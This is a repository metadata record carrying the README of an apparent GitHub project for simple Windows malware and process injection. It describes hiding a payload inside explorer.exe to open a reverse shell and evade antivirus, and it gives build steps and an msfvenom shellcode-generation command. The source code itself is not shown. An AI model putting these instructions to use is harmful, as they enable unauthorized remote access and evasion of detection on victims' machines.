{"id":20847282,"url":"https://github.com/jsmoreira02/process_injection","last_synced_at":"2025-03-12T11:43:17.923Z","repository":{"id":206089901,"uuid":"715707562","full_name":"Jsmoreira02/Process_Injection","owner":"Jsmoreira02","description":"Injection of malicious code into legitimate Windows processes for evasion and simple malware to gain unauthorized access, using the Windows API. Serves as proof of concept or intrusion detection exercises.","archived":false,"fork":false,"pushed_at":"2024-09-12T17:31:25.000Z","size":204,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-19T05:38:08.073Z","etag":null,"topics":["cybersecurity-awareness","cybsersecurity","hacking","malware-development","payload","process-injection","windows","windows-api"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Jsmoreira02.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-11-07T17:10:15.000Z","updated_at":"2024-09-12T17:31:28.000Z","dependencies_parsed_at":null,"dependency_job_id":"e3f7c1fe-285a-467d-8ea0-d0f1201024bb","html_url":"https://github.com/Jsmoreira02/Process_Injection","commit_stats":null,"previous_names":["jsmoreira02/wind0wsm4lware_"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FProcess_Injection","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FProcess_Injection/tags","re
leases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FProcess_Injection/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FProcess_Injection/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Jsmoreira02","download_url":"https://codeload.github.com/Jsmoreira02/Process_Injection/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243213867,"owners_count":20254879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity-awareness","cybsersecurity","hacking","malware-development","payload","process-injection","windows","windows-api"],"created_at":"2024-11-18T02:19:33.656Z","updated_at":"2025-03-12T11:43:17.895Z","avatar_url":"https://github.com/Jsmoreira02.png","language":"C++","readme":"\n\u003cdiv\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Language%20-C++-darkred.svg\" style=\"max-width: 100%;\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Tools%20-Windows API-green.svg\" style=\"max-width: 100%;\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Target OS%20-Windows 7..11-blue.svg\" style=\"max-width: 100%;\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Project%20-Malware | Process Injection-grey.svg\" style=\"max-width: 100%;\"\u003e\n\u003c/div\u003e\n\n\n# Simple Windows malware | Process injection\n\nA simple Windows payload and process injection proof of concept, written in C using the Windows API.
\n\n* **Windows API:** https://learn.microsoft.com/pt-br/windows/win32/apiindex/windows-api-list\n\n### **Process injection**\n\n![ezgif com-video-to-gif](https://github.com/Jsmoreira02/Wind0wsM4lware_/assets/103542430/090ca836-8c52-4feb-ba99-911b6dbabd90)\n\n\nProcess injection is an evasion technique in which an attacker executes malicious code inside the address space of a legitimate process. Because the code runs under the name of a trusted process, the malware is hidden, often raises no suspicion that an attacker is on the system, and is difficult to detect. Process injection can also evade antivirus, application control, and endpoint detection and response systems, because the process hosting the injected code is viewed as legitimate.\n\nAttackers usually pick common, trusted system processes such as svchost.exe, rundll32.exe, or even explorer.exe.\n\n* **Explorer_injection.exe:** Opens a reverse shell connection from the target computer by executing the payload inside the address space of the explorer.exe process.
\n\n#\n\n* **How to find the PID of a running Windows process:**\n\n![Screenshot_20231107_182320](https://github.com/Jsmoreira02/Wind0wsM4lware_/assets/103542430/1d9ab09e-04ac-45e2-8894-dfca0117868f)\n\n\n```bash\ntasklist | findstr \u003cprocess name\u003e\n```\n=\u003e CMD syntax: `Process_injection.exe \u003cPID\u003e`\n\n# Compiling | Install\n\n* **Installation:**\n```bash\ngit clone https://github.com/Jsmoreira02/Wind0wsM4lware_.git\ncd Wind0wsM4lware_\nmake\n```\n\n* **Compiling just one of the targets with the Makefile:** `make Process_injection` `make Win_malware` `make explorer_injection`\n\n* **Compiling the code (Windows):** `g++ code.c -o code` or `make` (in case mingw-w64 is installed)\n\n# MinGW-w64 Installation:\n\n**Debian/Ubuntu OS:**\n```bash\nsudo apt install mingw-w64-x86-64   # 64-bit\n# or\nsudo apt install mingw-w64          # 32-bit\n```\n\n**Fedora**:\n```bash\nsudo dnf install mingw64-gcc-c++\n```\n\n**Arch Linux**:\n```bash\nsudo pacman -S mingw-w64-gcc\n```\n\n=\u003e More info: https://www.mingw-w64.org/\n\n=\u003e Shellcode generator: `msfvenom -p \u003cPayload\u003e LHOST=\u003cIP\u003e LPORT=\u003cLOCAL PORT\u003e --platform windows --arch \u003cx64/x86\u003e -f c`\n\n# Warning:\n\u003e I am not responsible for any illegal use or damage caused by this tool. It primarily serves as a proof of concept, is intended to raise awareness about cybersecurity and can be improved in many ways.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsmoreira02%2Fprocess_injection","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjsmoreira02%2Fprocess_injection","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsmoreira02%2Fprocess_injection/lists"}